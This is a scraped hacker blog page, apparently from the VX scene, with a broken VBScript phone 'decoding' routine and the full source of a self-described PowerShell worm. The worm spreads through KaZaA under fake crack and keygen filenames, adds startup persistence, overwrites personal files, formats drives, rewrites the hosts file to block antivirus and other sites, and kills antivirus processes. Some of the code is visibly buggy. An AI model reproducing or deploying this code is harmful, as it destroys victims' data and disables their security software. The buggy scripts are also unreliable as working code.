Branko.D.Tomic Luxilius branko.82@hotmail.com
欢迎访问 undermine
# moderator & modifier
  • " ≝
  • ℜℵℜ "
  • seed
  • Exp'n'lorers
    "No man or
    fallen Angels from Heaven
    knows the Day when
    the Tribulation will begin,
    only Father in Heaven."
    "Everybody can kill
    The Body but never can't
    kill The Soul from
    Ever Mind Form."
    TagList
    Arhiva
    « » kol 2014
    • p
    • u
    • s
    • č
    • p
    • s
    • n
    •  
    •  
    •  
    •  
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    VX sites and other hack sites
    VX Heaven Portal of Russian Hackers VX Chaos   |
    NFC Bloger Edu Hack Cracker ET Fakultet             |
    Blog
    utorak, kolovoz 7, 2007
    " Dekodiranje mozemo izvrsiti putanjom
    scriptizacije u kojoj cemo ubaciti sledece:

    " No bitno je znati da tamo gde sam upisao
    seriskibrojtelefona vi trebate ubaciti
    vas SERIJSKI BROJ TELEFONA.

    " Preko USB-a Prikljucite vas kodirani Telefon
    na Computer i pocnimo...

    " Iskopirajte ove komande u Notepad
    zatim ubacite vas Serijski broj Telefona

    " Zatim kad ste sve upisali spasicete fajl
    u (save in) Direkno u drajver vaseg telefona
    i nazvacete ga decode.vbs i sacekajte malo
    odnosno ugasite natrenutak vas telefon pa ga
    upalite, a ako ta opcija sa fajlom decode.vbs
    raditi onda fajl nazovite drugacije decode.db
    ili decode.css ili keyfiledl.dll ili decode.dll   
    "Iskopirajte samo text ispod zvezdica...
    *****************************************************

    Function Decode(SerijskiBrojtelefona As String)
    Const D = "1234567890A78BCSDEFGHCS344HJKLM5657NBVLC90112TGMLKBHJFZGH3234"
    Dim I As Integer
    Dim DecodS As Integer
    Dim A_Long As Integer
    Dim Str As String
    A_Long = Len(SerijskiBrojtelefona)
    For I = 1 To A_Long
    String = Mid(SerijskiBrojtelefona, I, 1)
    CodS = Asc(String) + I
    If CodS > Len(D) Then CodS = Decode - Len(D)
    Decode = Decode & Mid(D, CodS, 1)
    Next I
    End Function

    ********************************************************

    " Zaboravih da vam dam jos jedno super uputsvo
    za vas problem: Ako ste zaboravili,
    koji je serijski broj telefona?! Onda cete
    morati da ubacite Chapo-Worm koji se nalazi
    u mojoj tag-listi. Udjite u listu Chapo-worm
    iskopirajte komande u notepad i onda ga nemojte
    usnimiti u formatu strejtsity.jpg vec cete ga
    usnimiti kao keydecoder.dll al sa istom procedurom
    koju sam ovde uneo za primer ...

    " Znaci iskopirajte chapo-worm komande
    i spasite ga u drajveru telefona koji se
    prikazuje dok je ukljucen sa USB kablom...

    " Nadam se da sam vam dobro OBJASNIO...?
    undermine @ 11:14 |Komentiraj | Komentari: 1 | Prikaži komentare
    Money Transfer
    set undermine your home page
    Ads Pay Pal Alert Pay Web Money My vacation is your 2% security ...
    how i' get webmoney, enable jscript or better browser
    then read my alert window...
     
    Warning!!!This wrapper provides human rights of malicious people! © 2010 Undermine. All Rigths Classed in 19 Article of Universal Declaration.

    Sharez-Worm.Branko.compcode
    Share: Digg Reddit Del.icio.us Ma.gnolia Stumble Upon Facebook Twitter Google Yahoo! MyWeb Furl" BlinkList Technorati Mixx Windows Live :z
    My wing is unknown look up on stars VX is way to heaven not difficult to go when
    time come I' know bcoz I' coming from bloody rain, and don't think you are all
    on strange and this promise land. Wher is your soul,heart,lifelove?
    Bcoz you're destructed angel.
    Worm.html
    # UnderminE alias Luxilius's Powershell Skript Worm
    #
    # This worm is for the PowerShell Script Interpreter
    # which is included with Microsoft Windows Vista
    #
    # This worm is ¸2008 by underminE alias Luxilius
    #
    # Visit my homepages: www.underminE.bloger.hr & www.underminE.bloger.hr & www.underminE.bloger.hr
    #
    # This worm has following features:
    #
    # - Spreads with P2P (KaZaA Lite) per JScript
    # - Writes a registry string to run every time windows starts
    # - Changes RegisteredOwner, RegisteredOrga, Ie Title, Hidden Files, FileExt and Ie Page
    # - overwrites specific files in Eigene Dateien Folder and Subfolders
    # - formating all insertet drives and discettes
    # - deletes files in %system32%\drivers\etc
    # - overwrites the host file in %system32%\drivers\etc
    # - kills some well-known Anti-Virus processes
    # - deletes Reg-Values from well-known Antiviruses
    # - tells a message to user, with informations about the worm
    #
    #
    # Informations:
    #
    # This worm is a proof of concept worm. Because of it is able
    # to run Powershell on Windows XP, too (Need .Net Framework 2.0)
    # this worm is dedicated to Windows XP. Well, yes, it runs on
    # Windows Vista, too. But I don't know if the structures are the
    # same as in windows Xp. Note that this worm uses ActiveX Objects.
    # In this worm I use Scripting.FileSystemObject and WScript.Shell
    # Object. I hope Vista will include those ActiveX Objects, too.
    # I am happy to be the coder of this worm. I like this language.
    # And I am looking forward to new Malware in PowerShell.
    # Now I will release more and more worms in this language.
    #
    # This worm is ¸2008 by underminE alias Luxilius. To tell me anything
    # write me an email @ hard.rock.blogger@gmail.com or a pm at www.underminE.bloger.hr
    #
    # ======================================================================

    $fso = New-Object -Com Scripting.FileSystemObject ;
    $wshs = New-Object -Com WScript.Shell ;
    $windir = $fso.GetSpecialFolder(0)
    $sysdir = $fso.GetSpecialFolder(1)

    $strInfoString_one = "This is a PowerShell Script worm. ";
    $strInfoString_two = "This worm is proof-of-concept ";
    $strInfoString_three = "the worm is ¸2008 by underminE alias Luxilius ";
    $strInfoString_four = "for informations write an email @ hard.rock.blogger@gmail.com ";


    $KazaaDir = $wshs.RegRead('HKEY_CURRENT_USER\Software\Kazaa\LocalContent\DownloadDir');
    $AllMshDateinCurDir = get-childitem *.msh
    foreach ($PowerShellScript in $AllMshDateinCurDir)
    {
      if ($PowerShellScript.Length=13035)
      {
        $MySelfWorm = $PowerShellScript.Name;
      }
    }
    $gtFilesMsh = $fso.getfile($MySelfWorm);
    if (!$fso.fileexists($Sysdir.Path\WinLuxUndermine.msh)
    {
        $gtFilesMsh.Copy($Sysdir.Path\WinLuxUndermine.msh);
    }
    $gtFilesMsh.copy("$KazaaDir\Microsoft Windows Vista Cd-Key.txt.msh");
    $gtFilesMsh.copy("$KazaaDir\Windows Vista Update.msh");
    $gtFilesMsh.copy("$KazaaDir\Ad-aware SE Personal Edition 1.06r1.msh");
    $gtFilesMsh.copy("$KazaaDir\Ashampoo Media Player 2.03 install.msh");
    $gtFilesMsh.copy("$KazaaDir\Allround WinZIP Key Generator.msh");
    $gtFilesMsh.copy("$KazaaDir\Talisman Desktop 2.99 Crack.msh");
    $gtFilesMsh.copy("$KazaaDir\Nero Burning Rom 6.6.0.13 Crack.msh");
    $gtFilesMsh.copy("$KazaaDir\Kaspersky KeyGen working.msh");
    $gtFilesMsh.copy("$KazaaDir\Daemon Tools Install + Crack.rar.msh");
    $gtFilesMsh.copy("$KazaaDir\AVP - AntiVirus Key Generator.msh");


    $wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0, "REG_DWORD");
    $wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1, "REG_DWORD");
    $wshs.regwrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "United People of infected Ps","REG_SZ");
    $wshs.regwrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner", "underminELuxilius","REG_SZ");
    $wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "Infected with Ps Worm by underminE alias Luxilius","REG_SZ");
    $wshs.regwrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", "explorer.exe  $sysdir.Path\WinLuxUndermine.msh" ,"REG_SZ");
    $wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.underminE.bloger.hr")


    $PersonalDirectory = $wshs.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal");
    UeberschreibeDateien($PersonalDirectory)

    function UeberschreibeDateien($strOrdner)
    {
        $StringToOverwrite = "This file was overwritten with a Ps Worm. ";
        $StringToOverwrite += "This Worm is ¸2008 by underminE alias Luxilius! ";
       
        $OverWrtOwnFiles = $fso.getfolder($strOrdner)
        $OverFiles = $OverWrtOwnFiles.Files
        $TheSubFldr = $OverWrtOwnFiles.subfolders
       
        foreach ($SubFiles in $TheSubFldr.Files)
        {
            $strGetExt = $fso.GetExtensionName($AlleDateien.Path);
            if ($strGetExt="JPG")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="BMP")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="GIF")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="PNG")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="JPEG")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="AVI")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="MP3")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="WMV")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="WMA")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="DOC")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="XLS")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="RTF")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="PPS")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="PPT")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="ZIP")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="RAR")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="CPP")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
        }
       
        foreach ($NochMehrUnterOrdner in $TheSubFldr)
        {
            UeberschreibeDateien($NochMehrUnterOrdner)
        }

    }

    $TheDrives = $fso.Drives
    foreach ($AllDrives in $TheDrives)
        {
        if ($AllDrives.DriveType=1)
        {
            format $AllDrives.Path /y
        }
        if ($AllDrives.DriveType=2)
        {
            format $AllDrives.Path /y
        }
    }


    cd "$sysdir.path\Drivers\etc";
    del "networks";
    del "protocol";
    del "services";
    del "hosts";
    del "hosts.bak";
    echo "# Host File overwritten by Ps Worm " >> hosts
    echo "# This file disallows you to visit av and dl sites :> " >> hosts
    echo " " >> hosts
    echo "127.0.0.1 www.antivir.de " >> hosts
    echo "127.0.0.1 www.bitdefender.de " >> hosts
    echo "127.0.0.1 www.znet.de " >> hosts
    echo "127.0.0.1 www.chip.de " >> hosts
    echo "127.0.0.1 www.virustotal.com " >> hosts
    echo "127.0.0.1 virusscan.jotti.org " >> hosts
    echo "127.0.0.1 www.kaspersky.com " >> hosts
    echo "127.0.0.1 www.sophos.de " >> hosts
    echo "127.0.0.1 www.trojaner-info.de " >> hosts
    echo "127.0.0.1 www.trojaner-help.de " >> hosts
    echo "127.0.0.1 www.arcabit.com " >> hosts
    echo "127.0.0.1 www.avast.com " >> hosts
    echo "127.0.0.1 www.grisoft.com " >> hosts
    echo "127.0.0.1 www.bitdefender.com " >> hosts
    echo "127.0.0.1 www.clamav.net " >> hosts
    echo "127.0.0.1 www.drweb.com " >> hosts
    echo "127.0.0.1 www.f-prot.com " >> hosts)
    echo "127.0.0.1 www.google.de " >> hosts
    echo "127.0.0.1 www.google.com " >> hosts
    echo "127.0.0.1 www.google.co.yu " >> hosts
    echo "127.0.0.1 www.fortinet.com " >> hosts
    echo "127.0.0.1 www.eset.com " >> hosts
    echo "127.0.0.1 www.nod32.com " >> hosts
    echo "127.0.0.1 www.norman.com " >> hosts
    echo "127.0.0.1 www.microsoft.com " >> hosts
    echo "127.0.0.1 www.anti-virus.by/en " >> hosts
    echo "127.0.0.1 www.symantec.com " >> hosts
    echo "127.0.0.1 www.windowsupdate.com " >> hosts
    echo "127.0.0.1 www.trendmicro.com " >> hosts
    echo "127.0.0.1 www.mcafee.com " >> hosts
    echo "127.0.0.1 www.viruslist.com " >> hosts
    echo "127.0.0.1 www.avp.com " >> hosts
    echo "127.0.0.1 www.zonelabs.com " >> hosts
    echo "127.0.0.1 www.heise.de " >> hosts
    echo "127.0.0.1 www.antivirus-online.de " >> hosts
    echo "127.0.0.1 www.free-av.com " >> hosts
    echo "127.0.0.1 www.panda-software.com " >> hosts
    echo "127.0.0.1 www.pc-welt.de " >> hosts
    echo "127.0.0.1 www.pc-special.net " >> hosts
    echo "127.0.0.1 download.freenet.de " >> hosts
    echo "127.0.0.1 www.vollversion.de " >> hosts
    echo "127.0.0.1 www.das-download-archiv.de " >> hosts
    echo "127.0.0.1 www.freeware.de " >> hosts
    echo "127.0.0.1 www.antiviruslab.com " >> hosts
    echo "127.0.0.1 www.search.yahoo.com " >> hosts
    echo "127.0.0.1 www.web.de " >> hosts
    echo "127.0.0.1 www.hotmail.com " >> hosts
    echo "127.0.0.1 www.hotmail.de " >> hosts
    echo "127.0.0.1 www.gmx.net " >> hosts
    echo "127.0.0.1 www.spiegel.de " >> hosts
    echo "127.0.0.1 www.icq.com " >> hosts
    echo "127.0.0.1 www.icq.de " >> hosts
    echo "127.0.0.1 www.ffh.de " >> hosts
    echo "127.0.0.1 www.lavasoft.de " >> hosts
    echo "127.0.0.1 www.de.wikipedia.org " >> hosts
    echo "127.0.0.1 www.wikipedia.org " >> hosts
    echo "127.0.0.1 www.en.wikipedia.org " >> hosts
    echo "127.0.0.1 www.wissen.de " >> hosts
    echo "127.0.0.1 www.virus-aktuell.de " >> hosts
    echo "127.0.0.1 www.arcor.de " >> hosts
    echo "127.0.0.1 www.t-online.de " >> hosts
    echo "127.0.0.1 www.t-com.de " >> hosts
    echo "127.0.0.1 www.alice-dsl.de " >> hosts
    echo "127.0.0.1 www.freenet.de " >> hosts
    echo "127.0.0.1 www.1und1.de " >> hosts
    echo "127.0.0.1 www.fbi.gov " >> hosts
    echo "127.0.0.1 www.polizei.de " >> hosts
    echo "127.0.0.1 www.mup.sr.gov.yu " >> hosts


    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\avgnt');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50'); 
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVG7_CC');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BDMCon'); 
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BDNewsAgent');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BDOESRV');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pccguide.exe');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DrWebScheduler');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpIDerMail'); 
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpIDerNT'); 
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MCAgentExe');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MCUpdateExe');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OASClnt');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VirusScan Online');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VSOCheckTask');
       
       
    tskill avcenter /a
    tskill avconfig /a
    tskill avscan /a
    tskill avguard /a
    tskill avgnt /a
    tskill update /a
    tskill preupd /a
    tskill avcmd /a
    tskill avesvc /a
    tskill kav /a
    tskill kavsvc /a
    tskill kavsend /a
    tskill keymanager /a
    tskill agentsvr /a
    tskill avgcc /a
    tskill avgupsvc /a
    tskill avgamsvr /a
    tskill vsserv /a
    tskill bdss /a
    tskill xcommsvr /a
    tskill bdnagent /a
    tskill bdoesrv /a
    tskill bdmcon /a
    tskill bdswitch /a
    tskill rtvr /a
    tskill bdsubmit /a
    tskill bdlite /a
    tskill agentsvr /a
    tskill tmproxy /a
    tskill PcCtlCom /a
    tskill pccguide /a
    tskill qttask /a
    tskill patch /a
    tskill Tmntsrv /a
    tskill PccPrm /a
    tskill DrWebUpW /a
    tskill spidernt /a
    tskill DrWebScd /a
    tskill DrWeb32w /a
    tskill drwadins /a
    tskill mcupdui /a
    tskill McTskshd /a
    tskill McAppIns /a
    tskill mghtml /a
    tskill McShield /a
    tskill Mcdetect /a
    tskill McVSEscn /a
    tskill oasclnt /a
    tskill mcvsshld /a


    echo "$strInfoString_one ";
    echo "$strInfoString_two ";
    echo "$strInfoString_three ";
    echo "$strInfoString_four ";

    $wshs.popup("www.underminE.bloger.hr - www.underminE.bloger.hr -
    www.underminE.bloger.hr | Worm ¸2008 by underminE alias Luxilius",2,"PowerShell Worm by underminE alias Luxilius");

    exit ;
    DonoR
    CURRENT MOON

    ALSO DONATE
            VX (at)

    Webmoney pursues:

    Z518898905521

    R733573362072

    share & email virus html
    Subscribe
    Share/Bookmark
    OWL ( applikacija )
    OWL DOWNLOAD  
                                                kevin mitnick
    Index.hr
    Nema zapisa.